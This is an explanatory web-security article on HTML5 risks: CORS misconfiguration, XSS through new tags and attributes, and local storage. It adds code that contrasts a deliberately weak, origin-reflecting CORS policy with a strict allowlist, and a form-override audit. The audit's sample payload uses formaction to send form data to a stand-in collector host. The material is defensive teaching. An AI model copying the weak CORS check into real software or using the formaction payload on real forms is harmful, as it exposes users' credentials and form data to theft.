Over the past few years, there have been a lot of changes affecting the key technologies that power the internet.
HTML is the dominant web language, and its new version, HTML5, provides impressive enhancements for new web applications.
However, when this fifth version of HTML was released back in 2014 and became really popular with web and app developers, the issues surrounding its internet security risks also took hold.
Just like every new technology, HTML5 is bound to have defects and pitfalls. Internet security experts and commenters had also predicted this, long before its release.
HTML5 AND ITS IMPORTANCE
HTML5 is the 5th revision of the HTML standard developed by W3C. While it was approved as a standard in October 2014, its adoption began several years earlier.
This language mainly describes the contents and appearance of web pages. Due to its many new features, it makes web pages more interactive and dynamic.
These features include messaging enhancements, new parsing rules to enhance flexibility, elimination of redundant attributes and native multimedia support.
W3C developed HTML5 mainly to address the compatibility issues with the previous HTML version.
The main reasons why this version has become so popular are the essential elimination of browser plugins, reduction of web development time and mobile friendliness.
HTML5 is also supported by all the major browser vendors including Google, Apple, Opera, Microsoft, and Firefox.
THE INTERNET SECURITY RISKS ASSOCIATED WITH HTML5
HTML5 has been adopted on a very large scale, across a large percentage of browsers, and mobile applications are now based on this language.
It is also important for developers and users to know about the internet security risks involved in order to be able to tackle them.
The security problems that affected the older version are still present.
More importantly, the new features in HTML5 present further internet security issues.
Below are some of the attacks made possible by HTML5.
1. CROSS ORIGIN RESOURCE SHARING (CORS ATTACK)
Cross-Origin Resource Sharing (CORS) is a feature that allows a resource to gain access to data from domains outside itself.
Using this feature, web pages can load resources including scripts, CSS style sheets, and images from different domains.
As such, a remote cyber attacker can inject code into the web pages.
An API called XMLHttpRequest makes this possible. Basically, this is an API that facilitates the transfer of data between a server and a client.
Before the introduction of HTML5, a site could not make direct requests to another site using this API.
Now, HTTP requests can be made, provided the requested site grants permission.
This is the point where a vulnerability can be exploited. Access is granted through the following header in the response: Access-Control-Allow-Origin.
If a website defines this header wrongly or bases it on a wrong assumption, access control can easily be bypassed.
A similar threat called Cross-Site-Request-Forgery (CSRF) was present in HTML4. However, with HTML5 this is possible without user interaction.
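The wrongly defined header described above, shown beside a stricter check, as an added example that is not part of the original article. The allowlist, the function names and the probe origins are constructed for illustration.

```javascript
// Added example: allowlist, function names and probe values are constructed.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// Wrongly defined: trusts any Origin that merely contains the site's domain
// and reflects it back with credentials enabled.
function corsHeadersWeak(origin) {
  if (typeof origin === "string" && origin.includes("example.com")) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
    };
  }
  return {};
}

// Stricter: the Origin must parse as a bare scheme://host[:port] value and
// match an allowlist entry exactly; anything else gets no CORS headers.
function corsHeadersStrict(origin) {
  if (typeof origin !== "string") return {};
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return {}; // "null" and malformed values are refused
  }
  if (parsed.origin !== origin || !ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin", // keep caches from serving one origin's response to another
  };
}

// Constructed Origin header values to run both policies against.
const PROBES = [
  "https://app.example.com",            // legitimate
  "https://example.com.untrusted.test", // trusted name used as a prefix
  "https://myexample.com.test",         // trusted name used as a suffix of a label
  "http://app.example.com",             // right host, wrong scheme
  "null",                               // sandboxed or file-based contexts
];

// Returns the probe origins for which a policy emits Access-Control-Allow-Origin.
function acceptedOrigins(policy, probes) {
  return probes.filter((o) => "Access-Control-Allow-Origin" in policy(o));
}
```

Running `acceptedOrigins` with each policy over `PROBES` shows the substring check granting access to four of the five values, while the exact-match check grants it only to the first.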
2. HTML5 TAG ABUSE
The new attributes and tags introduced by HTML5 present an internet security threat in the form of cross-site scripting (XSS) attacks. XSS attacks, where attackers run malicious scripts through unencoded or unvalidated user inputs, have been around for a while.
Developers often avoid them by filtering user inputs. This basically means not allowing users to input certain character sequences.
Some of the new attributes and tags in HTML5 can be employed to run scripts by bypassing input filters. With HTML5, any object can associate itself with any form regardless of its position on the web page.
This can be exploited for malicious purposes. Attackers can also modify web page forms using attributes in HTML5 such as formaction, formenctype, formmethod, formtarget and formnovalidate.
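A review check for the attributes listed above, set beside a character-sequence filter of the kind the article describes (an added example, not part of the original article). The function names and sample markup are constructed, and the regular-expression tokenizer is a simplification suited to auditing stored input, not a replacement for a parser-based sanitizer.

```javascript
// Added example: names and sample markup are constructed for illustration.
// Attributes that let an element attach itself to a form or override how
// that form is submitted.
const FORM_OVERRIDES = new Set([
  "form", "formaction", "formenctype", "formmethod", "formtarget", "formnovalidate",
]);

// Sequence-based input filter: rejects <script and inline on* event handlers.
function denylistAccepts(html) {
  return !/<\s*script|\son\w+\s*=/i.test(html);
}

// Audit: report every form-override attribute found in untrusted markup,
// as "tag[attribute]" strings in document order.
function findFormOverrides(html) {
  const hits = [];
  // Start tags, with quoted attribute values skipped as a unit.
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)((?:"[^"]*"|'[^']*'|[^'">])*)>/g;
  // Attribute name, optionally followed by a quoted or unquoted value.
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'<>]+))?/g;
  for (const [, tag, attrs] of html.matchAll(tagRe)) {
    for (const [, name] of attrs.matchAll(attrRe)) {
      const attr = name.toLowerCase();
      if (FORM_OVERRIDES.has(attr)) hits.push(`${tag.toLowerCase()}[${attr}]`);
    }
  }
  return hits;
}

// Constructed samples of user-submitted markup.
const SAMPLE_COMMENT = '<p class="note">Contact <a href="/help">support</a></p>';
const SAMPLE_OVERRIDE =
  '<button form="login" formaction="https://collector.invalid/submit">Continue</button>';
```

`denylistAccepts(SAMPLE_OVERRIDE)` returns `true` because the markup contains none of the filtered sequences, while `findFormOverrides` reports both `button[form]` and `button[formaction]`.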
3. LOCAL STORAGE
Prior to HTML5, browser data was stored through web cookies. The local storage feature in HTML5 was developed to improve internet security and enable storage of more web data.
It allows browsers to store and delete data based on name-value pairs. The good news is that it is origin-specific, meaning sites from different origins cannot access applications on local databases.
Unfortunately, it is vulnerable to the aforementioned XSS attacks.
Attackers can also redirect target site requests to different sites using DNS cache poisoning.
There are other internet security issues with HTML5 including Cross Document Messaging, Offline Web Applications, and the middleware framework.
Most of these internet security problems fall into the hands of the web developers.
As such, they can be mitigated by safe coding practices, regular code testing, education on the possible internet security threats, data sanitization and access restriction for untrusted code.